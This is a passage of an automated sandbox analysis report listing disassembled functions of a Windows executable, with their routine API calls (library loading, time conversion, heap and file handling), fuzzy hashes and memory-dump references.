                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • LoadLibraryW.KERNELBASE(riched32.dll,00000000,00438820,?,?,?,0040FE06), ref: 00419DF0
                                                                                  • LoadLibraryW.KERNEL32(riched20.dll,?,0040FE06), ref: 00419DF9
                                                                                  • OleInitialize.OLE32(00000000), ref: 00419E00
                                                                                  • InitCommonControlsEx.COMCTL32(?), ref: 00419E18
                                                                                  • SHGetMalloc.SHELL32(0044E800), ref: 00419E23
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: LibraryLoad$CommonControlsInitInitializeMalloc
                                                                                  • String ID: riched20.dll$riched32.dll
                                                                                  • API String ID: 448729520-3294723617
                                                                                  • Opcode ID: 90f14c158bcb89b69ea4bae273e6414ebbc239f5036364857f5d8bbe2d5c0ea4
                                                                                  • Instruction ID: bec1f3dff02ca963225762dc8c306ba0fdf2f44245cb56c0a91269f9c2818cf8
                                                                                  • Opcode Fuzzy Hash: 90f14c158bcb89b69ea4bae273e6414ebbc239f5036364857f5d8bbe2d5c0ea4
                                                                                  • Instruction Fuzzy Hash: F7F0E271B00308AFD7209FA1DC0DB8ABBE8EF40726F50042DE54493140D7B8A4018BA9
                                                                                  Function 00411162 Relevance: 10.6, APIs: 7, Instructions: 134timeCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                    • Part of subcall function 00409B26: GetVersionExW.KERNEL32(?), ref: 00409B4B
                                                                                  • FileTimeToLocalFileTime.KERNEL32(?,?,?,?), ref: 00411196
                                                                                  • FileTimeToSystemTime.KERNEL32(?,?,?,?), ref: 004111A6
                                                                                  • SystemTimeToTzSpecificLocalTime.KERNELBASE(00000000,?,?), ref: 004111B2
                                                                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 004111C0
                                                                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 004111CA
                                                                                  • FileTimeToSystemTime.KERNEL32(?,?,?,00000000,00000000,00000001), ref: 00411217
                                                                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00411294
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: Time$File$System$Local$SpecificVersion
                                                                                  • String ID:
                                                                                  • API String ID: 2092733347-0
                                                                                  • Opcode ID: 1c7870660a01dd65847697781f7578502900650e516b8c8511763e6d701e722f
                                                                                  • Instruction ID: 6100f1ab939499973783bd8b64e41088d3a7059288243f2f455175224bc31f79
                                                                                  • Opcode Fuzzy Hash: 1c7870660a01dd65847697781f7578502900650e516b8c8511763e6d701e722f
                                                                                  • Instruction Fuzzy Hash: DF410C71E00218ABCF14DFA5C8849EEB7F9FF48310B14856FE946E7254D738A949CB64
                                                                                  Function 004112B2 Relevance: 9.1, APIs: 6, Instructions: 104timeCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • SystemTimeToFileTime.KERNEL32(?,00411418,?,?), ref: 00411303
                                                                                  • LocalFileTimeToFileTime.KERNEL32(00411418,?), ref: 0041132F
                                                                                  • FileTimeToSystemTime.KERNEL32(00411418,?), ref: 00411345
                                                                                  • TzSpecificLocalTimeToSystemTime.KERNELBASE(00000000,?,?), ref: 00411355
                                                                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00411363
                                                                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 0041136D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: Time$File$System$Local$Specific
                                                                                  • String ID:
                                                                                  • API String ID: 3144155402-0
                                                                                  • Opcode ID: 16b3e87f3902756ff9327c032ae1a939148972bfe42c74fb0637f5a5c809bf78
                                                                                  • Instruction ID: f31d9a43c15d5ace768677a2ffe202ee34847638ee321b2b61110941f9993af9
                                                                                  • Opcode Fuzzy Hash: 16b3e87f3902756ff9327c032ae1a939148972bfe42c74fb0637f5a5c809bf78
                                                                                  • Instruction Fuzzy Hash: 16315E7AE0021D9BCB14DFE4C840AEFB7B8FF48710F04452AE955E3214E734A985CBA9
                                                                                  Function 0041A27A Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMONLIBRARYCODE
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1052 41a27a-41a28b call 41f84c 1055 41a302-41a307 call 41f891 1052->1055 1056 41a28d-41a294 1052->1056 1057 41a296-41a2ae call 41ed53 call 41ed86 1056->1057 1058 41a2d9 1056->1058 1070 41a2b0-41a2b8 call 41edb6 1057->1070 1071 41a2b9-41a2c9 call 41a2d0 1057->1071 1060 41a2da-41a2ea RtlFreeHeap 1058->1060 1060->1055 1063 41a2ec-41a301 call 41eb5e GetLastError call 41eb1c 1060->1063 1063->1055 1070->1071 1071->1055 1077 41a2cb-41a2ce 1071->1077 1077->1060
                                                                                  APIs
                                                                                  • __lock.LIBCMT ref: 0041A298
                                                                                    • Part of subcall function 0041ED53: __mtinitlocknum.LIBCMT ref: 0041ED69
                                                                                    • Part of subcall function 0041ED53: __amsg_exit.LIBCMT ref: 0041ED75
                                                                                    • Part of subcall function 0041ED53: EnterCriticalSection.KERNEL32(0041A71B,0041A71B,?,004251F8,00000004,0042DAA0,0000000C,004210EE,00000000,0041A72A,00000000,00000000,00000000,?,0041E716,00000001), ref: 0041ED7D
                                                                                  • ___sbh_find_block.LIBCMT ref: 0041A2A3
                                                                                  • ___sbh_free_block.LIBCMT ref: 0041A2B2
                                                                                  • RtlFreeHeap.NTDLL(00000000,00000000,0042D5E0,0000000C,0041ED34,00000000,0042D8B8,0000000C,0041ED6E,00000000,0041A71B,?,004251F8,00000004,0042DAA0,0000000C), ref: 0041A2E2
                                                                                  • GetLastError.KERNEL32(?,004251F8,00000004,0042DAA0,0000000C,004210EE,00000000,0041A72A,00000000,00000000,00000000,?,0041E716,00000001,00000214), ref: 0041A2F3
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                  • String ID:
                                                                                  • API String ID: 2714421763-0
                                                                                  • Opcode ID: bcbe32db6af557ffe86c7d94739138752961402e38fc8840a2aae5f7b369d5ba
                                                                                  • Instruction ID: 381a15fe1de2b8d741a4582f625916aaa43432517cedc4ba20c03ca41f2b946c
                                                                                  • Opcode Fuzzy Hash: bcbe32db6af557ffe86c7d94739138752961402e38fc8840a2aae5f7b369d5ba
                                                                                  • Instruction Fuzzy Hash: 5401F735906205A6DB307BB2AC06BCE3664AF01728F10415FF911962D1DB3D88D18B5E
                                                                                  Function 00410EA3 Relevance: 7.5, APIs: 5, Instructions: 36COMMONLIBRARYCODE
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                    • Part of subcall function 00410DF7: ResetEvent.KERNEL32(?,00000200,?,?,0040500E), ref: 00410E1D
                                                                                    • Part of subcall function 00410DF7: ReleaseSemaphore.KERNEL32(?,?,00000000), ref: 00410E2D
                                                                                  • ReleaseSemaphore.KERNEL32(?,00000020,00000000,02271260,?,00000000,00410FB2,?,?,00401024,?,?,0040128E), ref: 00410EBF
                                                                                  • CloseHandle.KERNEL32(02271264,02271264,0044E590,?,00000000,00410FB2,?,?,00401024,?,?,0040128E), ref: 00410EE0
                                                                                  • DeleteCriticalSection.KERNEL32(02271400,?,00000000,00410FB2,?,?,00401024,?,?,0040128E), ref: 00410EF6
                                                                                  • FindCloseChangeNotification.KERNELBASE(?,?,00000000,00410FB2,?,?,00401024,?,?,0040128E), ref: 00410F02
                                                                                  • CloseHandle.KERNEL32(?,?,00000000,00410FB2,?,?,00401024,?,?,0040128E), ref: 00410F0A
                                                                                    • Part of subcall function 00410C6C: WaitForSingleObject.KERNEL32(?,000000FF,00410E3A,?), ref: 00410C72
                                                                                    • Part of subcall function 00410C6C: GetLastError.KERNEL32(?), ref: 00410C7E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: Close$HandleReleaseSemaphore$ChangeCriticalDeleteErrorEventFindLastNotificationObjectResetSectionSingleWait
                                                                                  • String ID:
                                                                                  • API String ID: 565839277-0
                                                                                  • Opcode ID: b0c5eb44cc48d8aeceb54ba9457ac5ae927773a95a9fa64fa26639590f07cc77
                                                                                  • Instruction ID: 39e3286da5e2b9f463cf34e71c08a22c4378c42c6e023b13eb84673481210850
                                                                                  • Opcode Fuzzy Hash: b0c5eb44cc48d8aeceb54ba9457ac5ae927773a95a9fa64fa26639590f07cc77
                                                                                  • Instruction Fuzzy Hash: 88F06275101708DFD7316B74DC85AE7BBA9FB06315F00082AE69A41120CA7768A19B64
                                                                                  Function 00419A27 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1087 419a27-419a46 GetClassNameW 1088 419a48-419a5d call 411bd1 1087->1088 1089 419a6e-419a70 1087->1089 1094 419a6d 1088->1094 1095 419a5f-419a6b FindWindowExW 1088->1095 1090 419a72-419a75 SHAutoComplete 1089->1090 1091 419a7b-419a7d 1089->1091 1090->1091 1094->1089 1095->1094
                                                                                  APIs
                                                                                  • GetClassNameW.USER32(?,?,00000050), ref: 00419A3E
                                                                                  • SHAutoComplete.SHLWAPI(?,00000010), ref: 00419A75
                                                                                    • Part of subcall function 00411BD1: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,00000000,000000FF,00409BC8,?,00000000,?,00409CE2,00000000,-00000002,?,00000000,?), ref: 00411BE7
                                                                                  • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 00419A65
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                                                  • String ID: EDIT
                                                                                  • API String ID: 4243998846-3080729518
                                                                                  • Opcode ID: e0083f4051276fdce15bceb59e3080037d6ac23fe363074340fa8ca1fa73ee92
                                                                                  • Instruction ID: e0580f26e7dba7dbc242a01744853ed5fd2560c4a83a58afe7298293889790c2
                                                                                  • Opcode Fuzzy Hash: e0083f4051276fdce15bceb59e3080037d6ac23fe363074340fa8ca1fa73ee92
                                                                                  • Instruction Fuzzy Hash: A1F082323002186BD73097259C45FFB766C9F86B90F580066FE05E2290D768E99685BE
                                                                                  Function 004086E3 Relevance: 6.1, APIs: 4, Instructions: 104fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CreateFileW.KERNELBASE(?,-80000000,?,00000000,00000003,-00000001,00000000,00000000,00000000,?,00000000,00406DBE,00000000,00000005,?,00000011), ref: 00408774
                                                                                  • GetLastError.KERNEL32(?,00000000,00406DBE,00000000,00000005,?,00000011,00000000,?,00000000,?,0000003A,00000802,?,00000000,00000802), ref: 0040877D
                                                                                  • CreateFileW.KERNEL32(?,-80000000,?,00000000,00000003,00000000,00000000,?,?,00000800,?,00000000,00406DBE,00000000,00000005,?), ref: 004087B5
                                                                                  • GetLastError.KERNEL32(?,00000000,00406DBE,00000000,00000005,?,00000011,00000000,?,00000000,?,0000003A,00000802,?,00000000,00000802), ref: 004087B9
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateErrorFileLast
                                                                                  • String ID:
                                                                                  • API String ID: 1214770103-0
                                                                                  • Opcode ID: 5686757e3dffccfcd5476853105c90ad9b2e846fe1c9ad7ee051c9ad47f40b56
                                                                                  • Instruction ID: 062e89898b874755b3d9a5fb51e5e37505543be931fef43769ed50a19f90df97
                                                                                  • Opcode Fuzzy Hash: 5686757e3dffccfcd5476853105c90ad9b2e846fe1c9ad7ee051c9ad47f40b56
                                                                                  • Instruction Fuzzy Hash: 393158725047445BE7308B218D05BEBB7E4AB84718F204A2EF5D0A33C0DBB995498766
                                                                                  Function 0040184A Relevance: 6.1, APIs: 4, Instructions: 103COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 0040184F
                                                                                    • Part of subcall function 00405F34: __EH_prolog.LIBCMT ref: 00405F39
                                                                                    • Part of subcall function 00405F34: _memset.LIBCMT ref: 00405F9C
                                                                                    • Part of subcall function 00405F34: _memset.LIBCMT ref: 00405FA8
                                                                                    • Part of subcall function 00405F34: _memset.LIBCMT ref: 00405FC6
                                                                                    • Part of subcall function 0040B7B1: __EH_prolog.LIBCMT ref: 0040B7B6
                                                                                  • _memset.LIBCMT ref: 00401992
                                                                                  • _memset.LIBCMT ref: 004019A1
                                                                                  • _memset.LIBCMT ref: 004019B0
                                                                                    • Part of subcall function 0041A60A: _malloc.LIBCMT ref: 0041A624
                                                                                    • Part of subcall function 00409F46: __EH_prolog.LIBCMT ref: 00409F4B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memset$H_prolog$_malloc
                                                                                  • String ID:
                                                                                  • API String ID: 4233843809-0
                                                                                  • Opcode ID: cea251618a4196baa60a09cdfc26b4b325674e0615a38645109e1af8a8a80c47
                                                                                  • Instruction ID: 2fede72ccba09c749f0c8c909b52ed34bb2e7ac5ad8f76669cac34c0b6f6f395
                                                                                  • Opcode Fuzzy Hash: cea251618a4196baa60a09cdfc26b4b325674e0615a38645109e1af8a8a80c47
                                                                                  • Instruction Fuzzy Hash: B0510771845F809EC331DF7A88916C7FFE0AB29310F94496E91FE93282D7352658CB29
                                                                                  Function 00408BC0 Relevance: 6.1, APIs: 4, Instructions: 59fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetStdHandle.KERNEL32(000000F6,004325AC,?,00000000,?,?,00408DD0,?,00000000,00000800,?,00000000), ref: 00408BD1
                                                                                  • ReadFile.KERNELBASE(?,?,00000800,00000000,00000000,004325AC,?,00000000,?,?,00408DD0,?,00000000,00000800,?,00000000), ref: 00408BE9
                                                                                  • GetLastError.KERNEL32(?,00408DD0,?,00000000,00000800,?,00000000), ref: 00408C21
                                                                                  • GetLastError.KERNEL32(?,00408DD0,?,00000000,00000800,?,00000000), ref: 00408C3C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$FileHandleRead
                                                                                  • String ID:
                                                                                  • API String ID: 2244327787-0
                                                                                  • Opcode ID: c610f9014d8eeb7b064f26712c9d4da67e362c16071d56148ef50c45903ee7ce
                                                                                  • Instruction ID: 13e8381ba76e660ca590a80f80ea056ccdaf7de13a99e612f72684c5f07020c7
                                                                                  • Opcode Fuzzy Hash: c610f9014d8eeb7b064f26712c9d4da67e362c16071d56148ef50c45903ee7ce
                                                                                  • Instruction Fuzzy Hash: 3011A370609604EFEF249B60CA4096A37B9FB51374F10943FE596A52D4DE39DC81CB3A
                                                                                  Function 004075F0 Relevance: 6.0, APIs: 2, Strings: 1, Instructions: 786COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 004075F5
                                                                                    • Part of subcall function 004188B2: _wcscpy.LIBCMT ref: 0041899B
                                                                                  • _memcmp.LIBCMT ref: 00407BC9
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog_memcmp_wcscpy
                                                                                  • String ID: E
                                                                                  • API String ID: 1926841707-3568589458
                                                                                  • Opcode ID: aa54b7e7266cf7c08b5d2f9acdba42abb51fdcad739be4ed2ccc402481056f02
                                                                                  • Instruction ID: f9c8af1df3ef5d7c4a70e700ce4102f6c5c0276540fb6f08cb0a114df9005495
                                                                                  • Opcode Fuzzy Hash: aa54b7e7266cf7c08b5d2f9acdba42abb51fdcad739be4ed2ccc402481056f02
                                                                                  • Instruction Fuzzy Hash: BC72A770D086859AEF25DB64C444BEB7BA55F01304F0840FFE94A6B2D2C77D7A84CB6A
                                                                                  Function 0040CFC8 Relevance: 6.0, APIs: 4, Instructions: 29windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0040CFD9
                                                                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0040CFEA
                                                                                  • TranslateMessage.USER32(?), ref: 0040CFF4
                                                                                  • DispatchMessageW.USER32(?), ref: 0040CFFE
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: Message$DispatchPeekTranslate
                                                                                  • String ID:
                                                                                  • API String ID: 4217535847-0
                                                                                  • Opcode ID: 3bcc0019167008ed6046610103470990902ffce4856a4c3d90b832063c98dd80
                                                                                  • Instruction ID: e8fdd0a554a2632d2ff0352f7197dd0651b976686c93187f285c53448bd4587f
                                                                                  • Opcode Fuzzy Hash: 3bcc0019167008ed6046610103470990902ffce4856a4c3d90b832063c98dd80
                                                                                  • Instruction Fuzzy Hash: 0AE0ED72E0222AB7CB30ABE1AC0CCDBBF6CEE062657404021BD05E2014D638D116C7F5
                                                                                  Function 0040812B Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 119COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 00408130
                                                                                    • Part of subcall function 0040184A: __EH_prolog.LIBCMT ref: 0040184F
                                                                                    • Part of subcall function 0040184A: _memset.LIBCMT ref: 00401992
                                                                                    • Part of subcall function 0040184A: _memset.LIBCMT ref: 004019A1
                                                                                    • Part of subcall function 0040184A: _memset.LIBCMT ref: 004019B0
                                                                                    • Part of subcall function 00401440: __EH_prolog.LIBCMT ref: 00401445
                                                                                  • _wcscpy.LIBCMT ref: 004081CF
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog_memset$_wcscpy
                                                                                  • String ID: rar
                                                                                  • API String ID: 2876264062-1792618458
                                                                                  • Opcode ID: a84578caa249fda90f0110424be84e90377f3ec811dce38ddd6535a8ee302c02
                                                                                  • Instruction ID: 3983f395f1bbe4ca3dd186b8fcdf25185155a986bbeb1fad17e19b91f567a397
                                                                                  • Opcode Fuzzy Hash: a84578caa249fda90f0110424be84e90377f3ec811dce38ddd6535a8ee302c02
                                                                                  • Instruction Fuzzy Hash: D641A671944658AEDB24EB60C945BEA77B8AF14308F0448FFE48973182DB785FC4CB19
                                                                                  Function 00412461 Relevance: 4.6, APIs: 3, Instructions: 110COMMON
                                                                                  Download Yara Rule
